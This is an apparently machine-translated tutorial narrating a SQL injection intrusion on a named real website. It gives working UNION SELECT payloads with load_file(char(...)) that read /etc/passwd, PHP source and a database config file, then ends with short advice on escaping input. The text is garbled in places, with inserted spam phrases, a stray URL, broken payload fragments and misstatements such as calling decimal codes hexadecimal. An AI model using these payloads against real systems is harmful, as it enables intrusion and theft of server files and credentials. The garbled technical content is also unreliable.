PHP Injection Intrusion Instance

Listen to Promise said Casi out 2.0, and promise also gave a loophole address, just nothing to test a bit, recently very depressed, learn not to go on, just today promised to remind me of the good time to learn PHP, see if I can make such a stand.
Process:
The address promised was http://www.gametea.com//showboard.php?id=282.
Very standard PHP injection form, we also follow the standard PHP injection method to inject, first and then add a ',
http://www.gametea.com/showboard.php?id=282 '
1

He told us about 2 things, the first is MAGIC_QUOTES_GPC = Off
The second one is the Web path/home/newgt/showboard.php
Before committing the statement before we are going to explain the principle of PHP injection and a small example, PHP injection is the use of variable filtering caused by insufficient
Look at the following two sentences of SQL statements:
①select * from article WHERE articleid= ' $id '
②select * from article WHERE articleid= $id
Both formulations are common in various programs, but security is different, and the first sentence is the result of putting the variable $id in a pair of single quotes, which allows us to commit theself-priming magnetic pumpThe variable becomes a string, even if it contains the correct SQL statement, it will not execute normally, and the second sentence is different, because the variable is not put in single quotes, then we commit everything, as long as the space is included, the space after the variable will be executed as a SQL statement, We have submitted two successfully injected deformity statements for each of the two sentences to see the difference.
① specifies that the variable $id is:
1 ' and 1=2 union SELECT * from user where userid=1/*
At this point the entire SQL statement becomes:
SELECT * from article where articleid= ' 1 ' and 1=2 union SELECT * from user WHERE userid=1/* '
② specifies that the variable $id is:
1 and 1=2 Union SELECT * from user where userid=1
At this point the entire SQL statement becomes:
SELECT * from article where articleid=1 and 1=2 Union SELECT * FROM User WHERE userid=1
Did you see it? Since the first sentence has a single quotation mark, we must first close the preceding single quotation marks so that the following statements are executed as SQL and commented outself-priming magnetic pumpAfter the original SQL statement in the single quotation mark, so that it can be injected successfully, if the php.ini MAGIC_QUOTES_GPC set to ON or the variable before the use of the Addslashes () function, our attack will be naught, but the second sentence does not include the variable in quotation marks, Then we do not have to consider the closure, comments, direct submission is OK.
Okay, now we're going to commit the statement according to the Angel method. http://www.gametea.com/showboard.php?id=282 and 1=2 Union select 50,9,8,7,6,5,4,3,2,1


Here we can learn that 7 and 9 of these two places are text, that is, we can display the contents of the file we want, the following is to read the file on the server from the Web path to see this machine should be UNIX, then our goal is to get/etc/passwd this file
We know that in SQL statements, you can use a variety of MySQL built-in functions, often using database (), user (), system_user (), Session_user (), Current_User () These functions are used to get some information about the system, and there is a more useful function that is load_file (), which is to read the file and return the contents of the file as a string.
See here, should be able to think of what we can do, is to read some of the confidential documents, but also conditional restrictions:
To read the file must be on the server
The full path of the file must be specified
Must have permission to read and the file must be fully readable
The file you want to read must be less than max_allowed_packet
If the file does not exist or cannot be read for any of the above reasons, the function returns NULL. More difficult to meet is the permissions, under Windows, if NTFS is set up properly, is unable to read the relevant files, when encountered only administrators to access files, users do not want to load_file out.
In the actual injection, we have two difficult points to solve:
Absolute physical Path
Construct an effective malformed statement
In many PHP programs, when a wrong query is submitted, if display_errors = ON, the program exposes the absolute path to the Web directory, and as long as the path is known, the security of the entire server is severely compromised for a PHP program that can be injected. The construction statement is already a trifle.
We use the Load_file (char ()) function here, we need to convert the/etc/passwd into a 16-input system, and we'll take out the ASC2CHR tool to help us with our transformation work.
Three

We got the/etc/passwd 16 binary format easily.
Here is the build statement _file (char (47,101,116,99,47,112,97,115,115,119,100)), 6,5,4,3,2,1 ">http://www.gametea.com/ showboard.php?id=282 and 1=2 Union select 50,9,8,load_file (char (47,101,116,99,47,112,97,115,115,119,100)), 6,5,4,3,2,1
Very easy to get the/etc/passwd file, we look at a piece,



Now we have to find a way to read config file, because we get the path to the Web so it's easy to read.
Build Statement _file (char (47,104,111,109,101,47,110,101,119,103,116,47,115,104,111,119,98,111,97,114,100,46,112,104,112)) , 6,5,4,3,2,1 ">http://www.gametea.com//showboard.php?id=282 and 1=2 Union select 50,9,8,load_file (char ( 47,104,111,109,101,47,110,101,119,103,116,47,115,104,111,119,98,111,97,114,100,46,112,104,112)), 6,5,4,3,2,1


But unlike what we think, and did not get the PHP source code, the original PHP code again server-side execution, this time we can use the Angel method into the outfile to the file to be read back to the server, but I did not do so, Because I don't want to be confined to someone else's way of thinking. I think MySQL must have powerful functions to help us, remember when learning PHP when the string function learned that a function is replace () his role is to replace the specified string with the string we want, I think it will be able to use ,
Attached: replace () function prototype
Replace (STR,FROM_STR,TO_STR) returns the string str, whose string from-str all occurrences of string to-str instead of
Mysql>select REPLACE (' www.mysql.com ', ' w ', ' Ww ');
' WwWwWw.mysql.com '
Here I think about the fixed form of PHP source code is this,
So if we break the rules, put the
_file (char (47,104,111,109,101,47,110,101,119,103,116,47,115,104,111,119,98,111,97,114,100,46,112,104,112)), Char, char (+)), 6,5,4,3,2,1 ">http://www.gametea.com//showboard.php?id=282 and 1=2 Union select 50,9,8,replace (Load_file (char (47,104,111,109,101,47,110,101,119,103,116,47,115,104,111,119,98,111,97,114,100,46,112,104,112) ), char (6,5,4,3,2,1), char (32)),
CHAR (60) is
What he meant was to put in a space, we've succeeded, everybody look at the picture,


Okay, so here's our goal to read the config file. His config files are/home/newgt/localdata.php,
Enough to build the statement as follows
_file (char (47,104,111,109,101,47,110,101,119,103,116,47,108,111,99,97,108,100,97,116,97,46,112,104,112)), char ( ), char (+)), 6,5,4,3,2,1 ">http://www.gametea.com/showboard.php?id=282 and 1=2 Union select 50,9,8,replace (load_ File (char (47,104,111,109,101,47,110,101,119,103,116,47,108,111,99,97,108,100,97,116,97,46,112,104,112)), char ( ), char (32)), 6,5,4,3,2,1
7 We've got the config file,


Here our ideas should be clear, I do not go down, if you are interested in the words can refer to my previous articles to continue to infiltrate, here we have been able to clearly see a small injection of loopholes can lead to such a large loophole, I hope that the domestic people pay attention to up, The following is the solution to prevent can be from two aspects, one is the server, two is the code itself, the introduction of the server configuration of the article a lot, nothing is to set the MAGIC_QUOTES_GPC to On,display_errors set to OFF, here is not more said, Since the contact of this article is a matter of procedure, we still look for the reason from the procedure itself.
If PHP is easier to use than ASP, security, from the built-in functions can be reflected. If it is a variable of the shape, just use a intval () function to solve the problem, before executing the query, we first deal with the variables, as the following example is very safe:
$id = Intval ($id);
mysql_query ("SELECT * from article WHERE articleid= ' $id '");
or write this:
mysql_query ("SELECT * from article WHERE articleid=". Intval ($id). "")
Regardless of how it is constructed, it will eventually be converted into a plastic guess into the database. Many large programs are written in this way and are very concise.
String-shaped variables can also be used addslashes () the entire built-in function, the function is the same as MAGIC_QUOTES_GPC, after use, all the ' (single quotes), "(double quotation marks), (backslash) and null character automatically into the overflow character containing the backslash. And the new version of PHP, even if MAGIC_QUOTES_GPC open, and then use the Addslashes () function, there will be no conflict, you can rest assured that use. Examples are as follows:
$username = Addslashes ($username); http://www.qh.gov.cn/
mysql_query ("SELECT * from the members WHERE userid= ' $username '");
or write this:
mysql_query ("SELECT * from the members WHERE userid=". Addslashes ($username). "")
You can also use the addslashes () function to avoid the occurrence of quotation mark pairing errors. And just before the search engine repair method is directly the "_", "%" to "_" "%" on it, of course, do not forget to use the addslashes () function. The specific code is as follows:
$keywords = Addslashes ($keywords);
$keywords = Str_replace ("_", "_", $keywords);
$keywords = str_replace ("%", "%", $keywords);